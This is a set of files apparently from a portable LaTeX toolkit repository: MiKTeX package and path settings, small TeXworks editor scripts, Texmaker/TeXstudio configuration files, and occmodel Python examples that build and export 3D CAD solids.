TimeInstalled=1264143826
[arabtex]
TimeInstalled=1264143746
[miktex-texify-bin-2.8]
TimeInstalled=1256205834
[miktex-xetex-base]
TimeInstalled=1264143514
[geometry]
TimeInstalled=1256205799
[fancybox]
TimeInstalled=1264143765
[collectbox]
TimeInstalled=1338907352
[mhchem]
TimeInstalled=1264143807
[hoekwater]
TimeInstalled=1256205801
[miktex-freetype2-bin-2.8]
TimeInstalled=1256205824
[fourier]
TimeInstalled=1264143766
[pslatex]
TimeInstalled=1256205843
[tools]
TimeInstalled=1256205846
[miktex-hyph-french]
TimeInstalled=1256205826
[paralist]
TimeInstalled=1313545851
[microtype]
TimeInstalled=1313656016
[miktex-xdvipdfmx-bin-2.8]
TimeInstalled=1256205838
[fontspec]
TimeInstalled=1256205799
[bookman]
TimeInstalled=1256205796
[endfloat]
TimeInstalled=1313545724
[lettre]
TimeInstalled=1313545828
[miktex-makeindex-bin-2.8]
TimeInstalled=1256205827
[float]
TimeInstalled=1256205799
[revtex]
TimeInstalled=1264143835
[enctex]
TimeInstalled=1256205799
[wrapfig]
TimeInstalled=1264143876
[xetexref]
TimeInstalled=1256205846
[helvetic]
TimeInstalled=1256205801
[mflogo]
TimeInstalled=1256205817
[miktex-dvipdfmx-base-2.7]
TimeInstalled=1256205823
[miktex-dict-german]
TimeInstalled=1256205819
[ltxbase]
TimeInstalled=1256205817
[miktex-poppler-base]
TimeInstalled=1256205833
[miktex-mtprint-bin-2.8]
TimeInstalled=1256205829
[epsf]
TimeInstalled=1313545744
[luxi]
TimeInstalled=1264143793
[skak]
TimeInstalled=1313545739
[tugboat]
TimeInstalled=1264143875
[arphic]
TimeInstalled=1272028349
[csquotes]
TimeInstalled=1264143758
[upquote]
TimeInstalled=1346888485
[l3kernel]
TimeInstalled=1338906657
[fancyhdr]
TimeInstalled=1264143765
[memoir]
TimeInstalled=1264143805
[mongolian-babel]
TimeInstalled=1313545900
[subfig]
TimeInstalled=1264143839
[hyperref]
TimeInstalled=1264143390
[pgf]
TimeInstalled=1264143824
[marvosym]
TimeInstalled=1313545833
[bezos]
TimeInstalled=1264143755
[miktex-texware-bin-2.8]
TimeInstalled=1256205834
[xetex-pstricks]
TimeInstalled=1337869004
[miktex-web-bin-2.8]
TimeInstalled=1256205838
[animate]
TimeInstalled=1338907330
[ltxmisc]
TimeInstalled=1264143470
[lithuanian]
TimeInstalled=1313545892
[ae]
TimeInstalled=1256205787
[pstricks]
TimeInstalled=1264143713
[movie15]
TimeInstalled=1338904143
[miktex-zip-bin]
TimeInstalled=1256205838
[dinbrief]
TimeInstalled=1264143759
[miktex-cweb-base]
TimeInstalled=1256205818
[cm]
TimeInstalled=1256205796
[ec]
TimeInstalled=1256205799
[miktex-dvipdfmx-bin-2.8]
TimeInstalled=1256205823
[miktex-fonts-bin-2.8]
TimeInstalled=1256205824
[zhmetrics]
TimeInstalled=1264143901
[miktex-fontconfig-base]
TimeInstalled=1256205824
[xcolor]
TimeInstalled=1264143881
[oberdiek]
TimeInstalled=1264143684
[miktex-bin-2.8]
TimeInstalled=1256205818
[miktex-texworks-doc]
TimeInstalled=1256205836
[fp]
TimeInstalled=1338904165
[miktex-teckit-bin-2.8]
TimeInstalled=1256205834
[miktex-psutils-base]
TimeInstalled=1256205833
[miktex-gsf2pk-base]
TimeInstalled=1256205826
[makecmds]
TimeInstalled=1314706224
[prettyref]
TimeInstalled=1264143825
[miktex-metapost-bin-2.8]
TimeInstalled=1256205828
[miktex-freetype-base]
TimeInstalled=1256205824
[palatino]
TimeInstalled=1256205843
[cite]
TimeInstalled=1313545843
[wasysym]
TimeInstalled=1313545918
[algorithms]
TimeInstalled=1264143743
[miktex-mpm-bin-2.8]
TimeInstalled=1256205829
[lm]
TimeInstalled=1264143469
[xypic]
TimeInstalled=1256205847
[booktabs]
TimeInstalled=1264143756
[miktex-cjkutils-bin-2.8]
TimeInstalled=1256205818
[ms]
TimeInstalled=1313545760
[polyglossia]
TimeInstalled=1313545905
[rsfs]
TimeInstalled=1256205845
[tds]
TimeInstalled=1256205845
[xunicode]
TimeInstalled=1256205847
[miktex-bibtex8bit-base]
TimeInstalled=1256205818
[miktex-texinfo-base]
TimeInstalled=1256205834
[comment]
TimeInstalled=1346888479
[miktex-hyph-german]
TimeInstalled=1256205826
[zapfchan]
TimeInstalled=1256205847
[elsarticle]
TimeInstalled=1264143762
[miktex-metapost-base-2.7]
TimeInstalled=1256205828
[simplecv]
TimeInstalled=1264143837
[xetexurl]
TimeInstalled=1256205846
[miktex-mft-base]
TimeInstalled=1256205828
[times]
TimeInstalled=1256205845
[miktex-tex-bin-2.8]
TimeInstalled=1256205834
[eurosym]
TimeInstalled=1256205799
[miktex-tex-base]
TimeInstalled=1256205834
[pdftex-def]
TimeInstalled=1256205843
[tipa]
TimeInstalled=1264143871
[esint]
TimeInstalled=1264143763
[lastpage]
TimeInstalled=1313545732
[xgreek]
TimeInstalled=1264143714
[bibtopic]
TimeInstalled=1264143755
[natbib]
TimeInstalled=1264143810
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.tex]
extensions=
extensions;=.tex
extensions;=.src
path=.
path;=%R/tex/plain//
path;=%R/tex/generic//
path;=%R/tex//
[ft.enc]
path=.
path;=%R/fonts/enc//
;; <legacy>
path;=%R/pdftex//
path;=%R/dvips//
;; </legacy>
[ft.map]
path=.
path;=%R/fonts/map/pdftex//
path;=%R/fonts/map/dvips//
path;=%R/fonts/map//
;; <legacy>
path;=%R/pdftex//
path;=%R/dvips//
;; </legacy>
;;;
@<PASSWORD>
<file_sep>// TeXworksScript
// Title: Babel language
// Description: Looks for a Babel line to set the spell-check language
// Author: <NAME>
// Version: 0.1
// Date: 2009-11-21
// Script-Type: hook
// Hook: LoadFile
babelRE = new RegExp("\\\\usepackage\\[(?:.+,)*([^,]+)\\]\\{babel\\}");
spellingDict = new Array();
// extend or customize this list as needed
spellingDict.czech = "cs_CZ";
spellingDict.german = "de_DE";
spellingDict.germanb = "de_DE";
spellingDict.ngerman = "de_DE";
spellingDict.greek = "el_GR";
spellingDict.english = "en_US";
spellingDict.USenglish = "en_US";
spellingDict.american = "en_US";
spellingDict.UKenglish = "en_GB";
spellingDict.british = "en_GB";
spellingDict.spanish = "es_ES";
spellingDict.french = "fr_FR";
spellingDict.francais = "fr_FR";
spellingDict.latin = "la_LA";
spellingDict.latvian = "lv_LV";
spellingDict.polish = "pl_PL";
spellingDict.brazilian = "pt_BR";
spellingDict.brazil = "pt_BR";
spellingDict.portuges = "pt_PT";
spellingDict.portuguese= "pt_PT";
spellingDict.russian = "ru_RU";
spellingDict.slovak = "sk_SK";
spellingDict.slovene = "sl_SL";
spellingDict.swedish = "sv_SV";
// get the text from the document window
txt = target.text;
lines = txt.split('\n');
result = undefined;
// look for a babel line...
for (i = 0; i < lines.length; ++i) {
line = lines[i];
matched = babelRE.exec(line);
if (matched) {
lang = matched[1];
if (spellingDict[lang]) {
target.setSpellcheckLanguage(spellingDict[lang]);
result = "Set spell-check language to " + spellingDict[lang];
}
break;
}
// ...but give up at the end of the preamble
if (line.match("\\\\begin\\{document\\}")) {
break;
}
if (line.match("\\\\starttext")) { // oops, seems to be ConTeXt!
break;
}
}
result;
<file_sep>extensions
===========
Dot, MySQL, sgw and portableLatex for Windows.<file_sep>#!/usr/bin/python2
# -*- coding: utf-8 -*-
import sys
from math import *
from geotools import *
from gltools import *
from occmodel import *
from occmodelviewer import Viewer, viewer
e1 = Edge().createLine(start = (0.,0.,0.), end = (1.,1.,0.))
e1 = Edge().createArc3P(start = (1.,0.,0.), end = (-1.,0.,0.), pnt = (0.,1.,0.))
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
# Bezier
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (1.,1.5,0.))
e1 = Edge().createBezier(start,end,pnts)
# Spline
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (5.,1.5,0.))
e1 = Edge().createSpline(start,end,pnts)
# face
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
f1 = Face().createConstrained(e1, ((0.,.5,.25),))
# face edge sequence
start = Vertex(1.,0.,0.)
end = Vertex(-1.,0.,0.)
e1 = Edge().createLine(end,start)
pnt = (0.,1.,0.)
e2 = Edge().createArc3P(start,end,pnt)
w1 = Wire().createWire((e1,e2))
f1 = Face().createFace(w1)
# polygon
pnts = ((0.,0.,0.), (0.,2.,0.), (1.,2.,0.), (1.,0.,0.))
f1 = Face().createPolygonal(pnts)
# sphere
solid = Solid()
solid.createSphere((1.,2.,3.),.5)
# box
solid = Solid().createBox((0.,0.,0.),(100.,100.,100.))
# cylinder
solid = Solid().createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
# cone
solid = Solid().createCone((0.,0.,0.),(0.,0.,1.), 1., 2.)
# boolean union
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
s1.fuse(s2)
# boolean difference
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
s1.cut(s2)
# boolean intersection
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
s1.common(s2)
# extrude
pnts = (
(0.,0.,0.),
(0.,2.,0.),
(5.,1.5,0.),
(0.,0.,0.)
)
e1 = Edge().createSpline(points = pnts)
face = Face().createFace(e1)
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,5.))
# revolve
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e1)
solid = Solid().revolve(face, (0.,2.,0.), (1.,2.,0.), pi/2.)
# loaf
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createEllipse(center=(0.,0.,5.),normal=(0.,0.,1.), rMajor = 2.0, rMinor=1.0)
e3 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((e1,e2,e3))
# pipe
e1 = Edge().createArc((0.,0.,0.),(2.,0.,2.),(2.,0.,0.))
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
f1 = Face().createFace(e2)
solid = Solid().pipe(f1, e1)
print(solid.volume())
#print(dir(Viewer))
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,1.),
(0.75,0.,1.),
(0.75,0.,0.)),
close = False
)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 0.2)
mysolid = Solid().sweep(w1, e1)
print(mysolid.volume())
#coding: utf-8
# 使用 occmodel 模組, 間接擷取 Open CASCADE 函式庫
#from occmodel import *
# 建立三個 circles, 然後 loft 成實體, 印出體積後
# 最後再轉成 loft.stp STEP 檔案
第一個圓 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.2)
第二個圓 = Edge().createCircle(center=(0.,0.,5.),normal=(0.,0.,1.),radius = 1.5)
第三個圓 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((第一個圓,第二個圓,第三個圓), True)
print (solid.volume())
# 特別注意轉出 loft.stp 的用法
Tools.writeSTEP(bytes('loft.stp'.encode("utf-8")),solid)
<file_sep>// TeXworksScript
// Title: Make Bold
// Description: Encloses the current selection in \textbf{}
// Author: <NAME>
// Version: 0.1
// Date: 2009-08-31
// Script-Type: standalone
var txt = target.selection;
var len = txt.length;
target.insertText("\\textbf{" + txt + "}");
target.selectRange(target.selectionStart - len - 1, len);
<file_sep>[General]
launchOption=1
syntaxColoring=LaTeX
autoIndent=\x65e0
lineNumbers=true
wrapLines=true
tabWidth=32
font="\x5b8b\x4f53,9,-1,5,50,0,0,0,0,0"
language=\x65e0
scaleOption=1
previewScale=200
magnifierSize=2
circularMagnifier=true
defaultEngine=LaTeXify
autoHideConsole=true
openDialogDir=C:/Documents and Settings/amd/\x684c\x9762
recentFileList=C:/Documents and Settings/amd/\x684c\x9762/simple.tex, C:/Documents and Settings/amd/\x684c\x9762/untitled-1.tex, C:/Documents and Settings/amd/\x684c\x9762/test.tex, D:/LyTeX2/MyDoc/paper4/yen_python_intro.tex, C:/Documents and Settings/amd/\x684c\x9762/tt.tex, D:/LyTeX2/MyDoc/paper3/paper3.tex, C:/Documents and Settings/amd/\x684c\x9762/123333.tex, D:/LyTeX/MyDoc/yen2.tex, D:/LyTeX/MyDoc/test.tex, C:/Documents and Settings/amd/\x684c\x9762/14/yen1.tex
saveDialogDir=
<file_sep>#!/usr/bin/python2
# -*- coding: utf-8 -*-
#
# This file is part of occmodel - See LICENSE.txt
#
from math import pi, sin, cos, copysign
from occmodel import *
from occmodelviewer import viewer
import gltools as gl
'''
pnts = ((0.,0.,0.), (0.,2.,0.), (1.,2.,0.), (1.,0.,0.))
f1 = Face().createPolygonal(pnts)
print (f1)
print (f1.area())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (1.,1.5,0.))
b1 = Edge().createBezier(start,end,pnts)
print (b1)
print (b1.length())
start = None
end = None
pnts = ((0.,0.,0.), (0.,2.,0.), (0.5,1.,0.), (1.,-1.,0.))
b1 = Edge().createBezier(start,end,pnts)
print (b1)
print (b1.length())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (5.,1.5,0.))
s1 = Edge().createSpline(start,end,pnts)
print (s1)
print (s1.length())
'''
'''
start = None
end = None
pnts = ((0.,0.,0.),(0.,2.,0.), (5.,1.5,0.))
e1 = Edge().createSpline(start,end,pnts)
print (e1)
print (e1.length())
face = Face().createFace(e1)
print (face)
print (face.area())
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,5.))
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
'''
'''
start = Vertex(1.,0.,0.)
end = Vertex(-1.,0.,0.)
e1 = Edge().createLine(end,start)
print (e1)
print (e1.length())
pnt = (0.,1.,0.)
e2 = Edge().createArc3P(start,end,pnt)
print (e2)
print (e2.length())
face = Face().createFace((e1,e2), ((0.,.5,.5),))
print (face)
print (face.area())
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,5.))
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
viewer((face, e1), ('red', 'green'))
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createCircle(center=(0.,0.,5.),normal=(0.,0.,1.),radius = 1.5)
e3 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((e1,e2,e3), True)
print (solid.volume())
Tools.writeSTEP(bytes('test.stp'.encode("utf-8")),solid)
viewer(solid)
'''
solid = Solid()
solid.readSTEP('test.stp')
solid.heal()
viewer(solid)
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e1)
print (face)
print (face.area())
print (face.inertia())
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,1.))
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e1)
print face
print face.area()
solid = Solid().revolve(face, (0.,2.,0.), (1.,2.,0.), 90.)
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
'''
'''
model = Model()
model.createSphere(1.,2.,3.,.5)
#model.translate(-1.,-2.,-3.)
model.rotate((0.,0.,0.),(1.,0.,0.), 15.)
model.writeSTEP('test.stp')
print (model)
'''
'''
solid = Solid()
solid.createSphere((1.,2.,3.),.5)
plane = Plane.fromNormal((1.,2.,3.), (0.,1.,1.))
sec = solid.section(plane)
print ('area = ', sec.area())
viewer(sec)
'''
'''
solid = Solid().createBox((0.,0.,0.),(100.,100.,100.))
solid.shell(-5, lambda near,far: near[2] > 50 and far[2] > 50)
solid.fillet(2., lambda near,far: True)
#solid.writeSTEP('test.stp')
viewer(solid)
'''
'''
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
#s1.booleanUnion(s2)
#s1.booleanDifference(s2)
s1.booleanIntersection(s2)
#s1.writeSTEP('test.stp')
print (s1.volume())
'''
'''
s1 = Solid().createSphere((0.,0.,0.),.5)
print (s1.centreOfMass())
s1.translate((1.,0.,0.))
print (s1.centreOfMass())
'''
'''
s1 = Solid().createSphere((0.,0.,0.),.5)
print (s1.volume())
s2 = Solid().createSphere((2.,0.,0.),.5)
print (s2.volume())
s3 = Solid().addSolids((s1,s2))
print (s3.volume())
'''
'''
sp1 = Solid().createSphere((0.,0.,0.),.5)
print sp1.volume()
sp2 = sp1.copy()
print sp1.volume()
sp2.translate((.5, 0., 0.))
#sp2.scale((.5, 0., 0.), 1.25)
sp2.rotate((0.,-1.,0.),(0.,1.,0.),10.)
sp1.booleanDifference(sp2)
'''
'''
sp1 = Solid().createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
print (sp1.volume())
'''
'''
sp1 = Solid().createTorus((0.,0.,0.),(0.,0.,1.), 1., 2.)
print (sp1.volume())
'''
'''
c1 = Solid().createCone((0.,0.,0.),(0.,0.,1.), 1., 2.)
print (c1.volume())
'''
'''
b1 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
print (b1.volume())
'''
'''
b1 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
print b1.volume()
b1.fillet(.25, lambda start,end: start[2] > .5 and end[2] > .5)
print (b1.volume())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e2)
s1 = Solid().pipe(face, e1)
print (s1.volume())
'''
'''
p1 = Vertex(0.,0.,0.)
p2 = Vertex(1.,0.,0.)
p3 = Vertex(1.,1.,0.)
p4 = Vertex(0.,1.,0.)
e1 = Edge().createLine(p1,p2)
e2 = Edge().createLine(p2,p3)
e3 = Edge().createLine(p3,p4)
e4 = Edge().createLine(p4,p1)
face = Face().createFace((e1,e2,e3,e4))
print face.centreOfMass()
mesh = face.createMesh(0.1,.5)
print (mesh)
'''
'''
#solid = Solid().createSphere((0.,0.,0.),.5)
solid = Solid().createBox((0.,0.,0.),(1.,1.,1.))
mesh = solid.createMesh(0.1,.5)
print (mesh)
print (mesh.vertex(0))
print (mesh.normal(0))
print (mesh.triangle(0))
'''
'''
start = Vertex(1.,0.,0.)
end = Vertex(-1.,0.,0.)
pnt = (0.,1.,0.)
e1 = Edge().createArc3P(start,end,pnt)
print (e1.boundingBox())
pnts = (e1.tesselate())
print (pnts)
'''
'''
e1 = Edge().createHelix(.5, 2., 1.0, 0.)
print (e1.length())
print (e1.start)
print (e1.end)
'''
'''
p1 = Vertex(0.,0.,0.)
p2 = Vertex(1.,0.,0.)
p3 = Vertex(1.,1.,0.)
p4 = Vertex(0.,1.,0.)
e1 = Edge().createLine(p1,p2)
e2 = Edge().createLine(p2,p3)
e3 = Edge().createLine(p3,p4)
e4 = Edge().createLine(p4,p1)
w1 = Wire().createWire((e1,e2,e3,e4))
print w1.length()
f1 = Face().createFace(w1)
print (f1.area())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createEllipse(center=(0.,0.,5.),normal=(0.,0.,1.), rMajor = 2.0, rMinor=1.0)
e3 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((e1,e2,e3), False)
print (solid.volume())
'''
'''
rect = Wire().createRectangle(height = 2., radius = .5)
print (rect.length())
'''
'''
w1 = Wire().createRegularPolygon()
print w1.length()
f1 = Face().createFace(w1)
print (f1.area())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
plane = Plane()
print (e1.hasPlane(plane = plane))
print (plane)
'''
'''
solid = Solid().createBox((0.,0.,0.),(1.,1.,1.))
e1 = Edge().createCircle(center=(0.5,0.,.5),normal=(0.,0.,1.),radius = 0.25)
e2 = Edge().createCircle(center=(0.5,0.5,1.),normal=(0.,0.,1.),radius = 0.1)
w1 = Wire().createWire(e2)
e3 = Edge().createCircle(center=(1.0,0.5,1.),normal=(0.,0.,1.),radius = 0.25)
f1 = Face().createFace(e3)
solid.cut((e1,w1,f1))
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createCircle(center=(0.,0.,.5),normal=(0.,0.,1.),radius = 1.5)
v1 = Vertex(0.,0.,1.)
solid = Solid().loft((e1,e2,v1))
print (solid.volume())
'''
'''
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,5.),
(5.,0.,5.)),
close = False
)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
solid = Solid().sweep(w1, e1, cornerMode = SWEEP_RIGHT_CORNER)
print (solid.volume())
'''
'''
w1 = Wire().createPolygon((
(0.,0.,0.),
(1.,0.,0.),
(.5,1.,0.)),
close = True
)
f1 = Face().createFace(w1)
e1 = Edge().createCircle(center=(.5,.5,-1.),normal=(0.,0.,1.),radius = .15)
f1.booleanIntersection(e1)
#f1.booleanDifference(e1)
solid = Solid().extrude(f1, (0.,0.,0.), (0.,0.,1.))
solid.createMesh()
'''
'''
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,5.),
(5.,0.,5.)),
close = False
)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
solid = Solid().sweep(w1, e1, cornerMode = SWEEP_RIGHT_CORNER)
print (solid.volume())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e2)
e3 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .8)
face.cut(e3)
s1 = Solid().pipe(face, e1)
print (s1.volume())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
start = Vertex(0.,1.,0.)
end = Vertex(2.,1.,2.)
cen = (2.,1.,0.)
e2 = Edge().createArc(start,end,cen)
face = Face().loft((e1,e2))
print (face.isValid())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().sweep(e2, e1)
print (face.isValid())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createCircle(center=(-1.,0.,0.),normal=(0.,0.,1.),radius = .5)
e3 = Edge().createCircle(center=(1.,0.,0.),normal=(0.,0.,1.),radius = .5)
w1 = Wire().createWire(e1)
print w1.length()
w1.cut((e2,e3))
print (w1.length())
'''
'''
face = Face().createPolygonal(((0.,0.,0.),(1.,1.,0.),(1.,1.,1.),(0.,0.,1.)))
e1 = Edge().createCircle(center=(.5,0.2,.5),normal=(0.,1.,0.),radius = .25)
w1 = Wire().createWire(e1)
w1.project(face)
print (w1.isValid())
'''
'''
p1 = Vertex(0.,0.,0.)
p2 = Vertex(1.,0.,0.)
p3 = Vertex(1.,1.,0.)
e1 = Edge().createLine(p1,p2)
e2 = Edge().createLine(p2,p3)
w1 = Wire().createWire((e1,e2))
#face = Face().extrude(w1, (0.,0.,0.),(0.,0.,1.))
face = Face().revolve(w1, (0.,0.,0.),(0.,1.,0.), 90.)
print (face.isValid())
#print face.typeName()
#Tools.writeSTEP('test.stp', face)
'''
#solid = Solid()
#solid.createSphere((1.,2.,3.),.5)
#print solid.shapeType()
#Tools.writeSTEP('test.stp', solid)
#Tools.writeBREP('test.brp', solid)
#Tools.writeSTL('test.stl', solid)
#Tools.writeVRML('test.wrl', solid)
# expected bytes, str found
#print (Tools.readSTEP('test.stp'))<file_sep>Your XMing should be located here.
http://sourceforge.net/projects/xming/<file_sep>;;; DO NOT EDIT THIS FILE!
[MPM]
AutoInstall=2
<file_sep>[General]
IniMode=true
[texmaker]
ToolBar\CentralVisible=true
StructureView\ShowLinenumbers=false
StructureView\Indentation=-1
Files\New%20File%20Encoding=UTF-8
Files\Auto%20Detect%20Encoding%20Of%20Loaded%20Files=true
Files\Max%20Recent%20Files=5
Files\Max%20Recent%20Projects=3
Files\Recent%20Project%20Files=@Invalid()
Files\RestoreSession=false
Files\Session\Files=S:/examples/simple.tex
Files\Session\curRows=@Variant(\0\0\0\t\0\0\0\x1\0\0\0\x2\0\0\0\0)
Files\Session\curCols=@Variant(\0\0\0\t\0\0\0\x1\0\0\0\x2\0\0\0\0)
Files\Session\firstLines=@Variant(\0\0\0\t\0\0\0\x1\0\0\0\x2\0\0\0\0)
Files\Session\MasterFile=
Files\Parse%20BibTeX=true
Files\Parse%20Master=true
Files\Autosave=0
Spell\DictionaryDir=S:/TeXstudio2.3/dictionaries
Spell\Language=de_DE
Spell\Dic=s:/TeXstudio2.3/dictionaries/de_DE.dic
Thesaurus\Database=s:/TeXstudio2.3/dictionaries/th_en_US_v2.dat
User\ToolNames=@Invalid()
User\Tools=@Invalid()
Editor\WordWrapMode=1
Editor\WrapLineWidth=80
Editor\Parentheses%20Matching=true
Editor\Parentheses%20Completion=true
Editor\Line%20Number%20Multiples=1
Editor\Cursor%20Surrounding%20Lines=5
Editor\Auto%20Indent=true
Editor\Weak%20Indent=true
Editor\Indent%20with%20Spaces=false
Editor\Folding=true
Editor\Show%20Line%20State=true
Editor\Show%20Cursor%20State=true
Editor\Real-Time%20Spellchecking=true
Editor\Check%20Spelling=true
Editor\Check%20Citations=true
Editor\Check%20References=true
Editor\Check%20Syntax=true
Editor\Show%20Whitespace=true
Editor\TabStop=4
Editor\ToolTip%20Help=true
Editor\ToolTip%20Preview=true
Editor\Replace%20Quotes=0
Editor\Display%20Modifytime=true
Editor\Close%20Search%20Replace%20Together=false
Editor\Use%20Line%20For%20Search=true
Editor\Search%20Only%20In%20Selection=true
Editor\Auto%20Replace%20Commands=true
Editor\Font%20Family=Courier New
Editor\Font%20Size=10
Editor\Esc%20for%20closing%20log=false
Editor\Mouse%20Wheel%20Zoom=true
Editor\Hack%20Auto%20Choose=true
Editor\Hack%20Disable%20Fixed%20Pitch=false
Editor\Hack%20Disable%20Width%20Cache=false
Editor\Hack%20Disable%20Line%20Cache=false
Editor\Hack%20Disable%20Accent%20Workaround=false
Editor\Hack%20Render%20Mode=0
Editor\Completion=true
Editor\Completion%20Case%20Sensitive=2
Editor\Completion%20Complete%20Common%20Prefix=true
Editor\Completion%20EOW%20Completes=true
Editor\Completion%20Enable%20Tooltip%20Help=true
Editor\Completion%20Use%20Placeholders=true
Editor\Completion%20Prefered%20Tab=0
Editor\Completion%20Tab%20Relative%20Font%20Size%20Percent=100
Dialogs\Last%20Hard%20Wrap%20Column=80
Dialogs\Last%20Hard%20Wrap%20Smart%20Scope%20Selection=false
Dialogs\Last%20Hard%20Wrap%20Join%20Lines=false
Tools\SingleViewerInstance=false
Tools\Show%20Log%20After%20Compiling=true
Tools\Show%20Stdout=1
Tools\Automatic%20Rerun%20Times=5
Tools\Auto%20Checkin%20after%20Save=false
Tools\SVN%20Undo=false
Tools\SVN%20KeywordSubstitution=false
Tools\SVN%20Search%20Path%20Depth=2
GUI\Style=false
GUI\Texmaker%20Palette=false
GUI\Use%20System%20Theme=true
X11\Font%20Family=\x65b0\x7d30\x660e\x9ad4
X11\Font%20Size=9
X11\Style=
Interface\Config%20Show%20Advanced%20Options=false
Interface\Config%20Riddled=false
LogView\Tabbed=true
Interface\New%20Left%20Panel%20Layout=true
Interface\Language=
Preview\Mode=4
Preview\Auto%20Preview=1
Preview\Auto%20Preview%20Delay=300
Geometries\PdfViewerLeft=453
Geometries\PdfViewerTop=256
Geometries\PdfViewerWidth=453
Geometries\PdfViewerHeight=256
Geometries\PdfViewerState=@ByteArray()
Preview\DPI=99
Preview\Scale%20Option=1
Preview\Scale=100
Preview\Magnifier%20Size=300
Preview\Magnifier%20Shape=1
Preview\Magnifier%20Border=false
Preview\Sync%20File%20Mask=*.tex
Tools\User%20Class=@Invalid()
Tools\User%20Paper=@Invalid()
Tools\User%20Encoding=@Invalid()
Tools\User%20Options=@Invalid()
Quick\Class=article
Quick\Typeface=10pt
Quick\Papersize=a4paper
Quick\Encoding=latin1
Quick\AMS=true
Quick\MakeIndex=false
Quick\Author=
Quick\Geometry%20Page%20Width=0
Quick\Geometry%20Page%20Height=0
Quick\Geometry%20Margin%20Left=0
Quick\Geometry%20Margin%20Right=0
Quick\Geometry%20Margin%20Top=0
Quick\Geometry%20Margin%20Bottom=0
Quick\Geometry%20Page%20Width%20Unit=cm
Quick\Geometry%20Page%20Height%20Unit=cm
Quick\Geometry%20Margin%20Left%20Unit=cm
Quick\Geometry%20Margin%20Right%20Unit=cm
Quick\Geometry%20Margin%20Top%20Unit=cm
Quick\Geometry%20Margin%20Bottom%20Unit=cm
Quick\Geometry%20Page%20Width%20Enabled=false
Quick\Geometry%20Page%20Height%20Enabled=false
Quick\Geometry%20Margin%20Left%20Enabled=false
